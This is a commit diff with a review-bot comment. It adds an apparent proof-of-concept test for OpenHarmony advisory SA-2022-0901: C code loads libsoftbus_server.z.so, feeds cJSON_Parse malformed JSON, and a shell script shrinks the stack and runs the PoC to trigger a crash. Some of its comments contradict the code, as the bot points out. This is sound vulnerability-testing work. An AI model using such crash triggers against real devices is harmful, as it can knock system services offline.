提交 554fa3d7 编写于 作者: J jingyu123412

提交OpenHarmony-SA-2022-0901动态测试用例

Signed-off-by: Njingyu123412 <1565704822@qq.com>
上级 73319548
/*
/*
* Copyright (c) 2023 Huawei Device Co., Ltd.
*
* Licensed under the Apache License, Version 2.0 (the "License");
......@@ -13,12 +13,44 @@
* See the License for the specific language governing permissions and
* limitations under the License.
*/
// 编译时需要使用-l参数链接cjson共享库
#include <stdio.h>
#include <cjson/cJSON.h>
#include <dlfcn.h>
//#include <memory>
#include <stdio.h>
#include <unistd.h>
/* The cJSON structure: */
typedef struct cJSON
{
struct cJSON *next;
struct cJSON *prev;
struct cJSON *child;
int type;
char *valuestring;
int valueint;
double valuedouble;
char *string;
} cJSON;
int main()
{
void *handle;
// 打开共享库libsoftbus_server.z.so
handle = dlopen("/system/lib/libsoftbus_server.z.so", RTLD_LAZY);
if (!handle)
{
fprintf(stderr, "Error: %s\n", dlerror());
return 1;
}
// 获取函数DisplayManager::GetInstance地址
typedef cJSON* (*Func)(char*);
Func cJSON_Parse = reinterpret_cast<Func>(dlsym(handle, "cJSON_Parse"));
if (cJSON_Parse == NULL) {
fprintf(stderr, "Error: %s\n", dlerror());
dlclose(handle);
return 1;
}
// 准备一个具有900层嵌套结构的json数据
char *json_string = "{\"a}";
......@@ -32,7 +64,8 @@ int main()
}
// 返回值不为null,没有修复漏洞,应该收到signal 11段错误提示
printf("OpenHarmony-SA-2022-0901 : vulnerable\n");
cJSON_Delete(root);
//cJSON_Delete(root);
return 0;
}
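Review bot: The two comments in the first hunk no longer match the code they sit on, which is misleading in a test that is supposed to document how OpenHarmony-SA-2022-0901 is triggered: the one above the `dlsym` call names `DisplayManager::GetInstance` although the symbol resolved is `cJSON_Parse`, and the one above `char *json_string = "{\"a}";` promises 900 nested levels although the literal is a single object with an unterminated key. I would replace them with `// resolve cJSON_Parse from libsoftbus_server.z.so` and `// malformed input: object key with no closing quote`. In the second hunk the cleanup looks disabled rather than ported (`//cJSON_Delete(root);`), so `root` is never freed and `handle` is never closed on the path that prints the verdict; resolving `cJSON_Delete` through `dlsym` as well and adding `dlclose(handle);` before `return 0;` would fix that. `reinterpret_cast` also only compiles as C++, so if this file is built as C the cast needs to be `(Func)dlsym(handle, "cJSON_Parse")`. The part of `main` between the two hunks is not visible here.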
......@@ -19,8 +19,5 @@
#或者也可以继续增加嵌套的层数,使栈溢出,每增加一层会多占用64B的栈空间
ulimit -s 60
#设置LD_LIBARAY_PATH环境变量,指向cJSON的共享库文件存储位置
export LD_LIBRARY_PATH=/data/local/tmp
#运行poc可执行程序
./poc